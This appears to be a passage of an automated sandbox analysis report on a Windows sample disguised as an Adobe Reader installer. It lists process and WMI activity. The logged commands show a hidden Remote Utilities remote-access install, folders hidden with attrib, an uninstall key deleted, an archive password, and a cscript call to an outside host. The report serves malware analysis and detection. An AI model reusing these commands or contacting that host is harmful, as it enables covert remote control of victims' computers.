Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Reads ini files

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Reads the Windows registered organization settings

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe'
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding AA4D321CBB51DB47279651D4C4A42DCE C
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding 811B175E7191221789A53427DBAD15F3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {0EBC3A93-A818-47F5-837A-5A0A478FB651} S-1-5-21-290172400-2828352916-2832973385-1001:computer\user:Interactive:[1]
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding 2EDF85C04E0081D90ED7293C0FDDF85C C
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding F7FCF8C7FA5995D0F2A8BA3C03B96EE9
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C '7zaa.exe'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'armstall.exe'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rutserv.exe'
Source: unknown	Process created: C:\inst_fold\7zaa.exe 'C:\inst_fold\7zaa.exe' x -oC:\inst_fold -pdsiSDJJiojeflOSIOwp3#DSIJ23jeewE@_SDD_as2 C:\inst_fold\arm.7z
Source: unknown	Process created: C:\inst_fold\fp.exe 'C:\inst_fold\fp.exe'
Source: unknown	Process created: C:\inst_fold\armstart.exe 'C:\inst_fold\armstart.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe 'C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe' /rsetup
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armgrd.bat' '
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armsettings.bat' '
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\inst_fold'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\inst_fold\armstatus.exe'
Source: unknown	Process created: C:\inst_fold\armforce.exe 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\inst_fold\armstart.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat'
Source: unknown	Process created: C:\Windows\System32\reg.exe reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E945283B-758C-4A40-B851-1066D0E49EA8} /f
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\regedit.exe regedit /s 'C:\inst_fold\armfix.reg'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\reg.exe reg import 'C:\inst_fold\armfix.reg' /reg:64
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\inst_fold\armforce.exe 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe unknown
Source: unknown	Process created: C:\inst_fold\armstatus.exe 'C:\inst_fold\armstatus.exe' 1 C:\inst_fold\armdaemon.js
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1''
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Source: unknown	Process created: C:\Windows\System32\attrib.exe ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi'
Source: unknown	Process created: C:\Windows\System32\attrib.exe ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\attrib.exe ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
